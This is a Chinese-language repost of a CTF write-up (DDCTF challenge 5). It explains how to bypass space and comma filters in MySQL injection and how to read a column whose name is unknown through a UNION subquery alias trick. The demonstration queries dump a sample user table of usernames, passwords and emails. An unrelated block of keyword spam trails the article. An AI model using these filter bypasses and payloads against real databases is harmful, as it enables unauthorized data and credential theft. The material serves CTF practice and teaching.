千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 数据库 >

Mysql绕过未知字段名的方法

发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,小编给大家分享一下Mysql绕过未知字段名的方法,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!前言本文介绍的是DDCTF第
千家信息网最后更新 2025年01月20日Mysql绕过未知字段名的方法

小编给大家分享一下Mysql绕过未知字段名的方法,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!

前言

本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:

实现思路

题目过滤空格和逗号,空格使用%0a,,,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;

存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:

思想就是获取flag,让其在已知字段名下出现;

示例代码:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| a | b | c | d |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;+---+-------+----------+-------------+| 1 | 2  | 3  | 4   |+---+-------+----------+-------------+| 1 | 2  | 3  | 4   || 1 | admin | admin888 | 110@110.com || 2 | test | test123 | 119@119.com || 3 | cs | cs123 | 120@120.com |+---+-------+----------+-------------+4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;+-------------+| 4   |+-------------+| 4   || 110@110.com || 119@119.com || 120@120.com |+-------------+4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+| 4   |+-------------+| 120@120.com |+-------------+1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)dunion select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;+-------------+----------+----------+-------------+| id   | username | password | email  |+-------------+----------+----------+-------------+| 1   | admin | admin888 | 110@110.com || 120@120.com | 1  | 1  | 1   |+-------------+----------+----------+-------------+2 rows in set (0.04 sec)

以上是Mysql绕过未知字段名的方法的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注行业资讯频道!

很赞哦!
字段 方法 内容 思路 空格 篇文章 逗号 不怎么 代码 前言 名下 大部分 就是 思想 技巧 括号 更多 知识 示例 行业 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 为什么要建立后台数据库 石家庄数据库哪家好 汽车人软件开发流程 魂斗罗是什么软件开发 网络安全事件处置情况反馈 广州移动设备管理软件开发 网络安全有关的课题 sqlite内存数据库效率 开发票的服务器编码怎么填 气象网络安全工作总结 综合柜员制软件开发 页面中修改数据库中的内容 数据库闭包咋算 最新流行数据库软件 大同微信软件开发 服务器怎么设置is最大连接数 网络安全警告服务器 数据库的安全技术有哪些 制造企业软件开发团队 软件开发app推广 破坏网络安全的有关例子 局网络安全保密管理制度 5g网络技术背景 广发研究中心软件开发笔试题 网络安全周主题会议 数据库查询语句完整 施耐德plc软件开发语言 网络安全信息安全国家安全 网络安全演讲小学生 厦门服务器费用

相关文章

0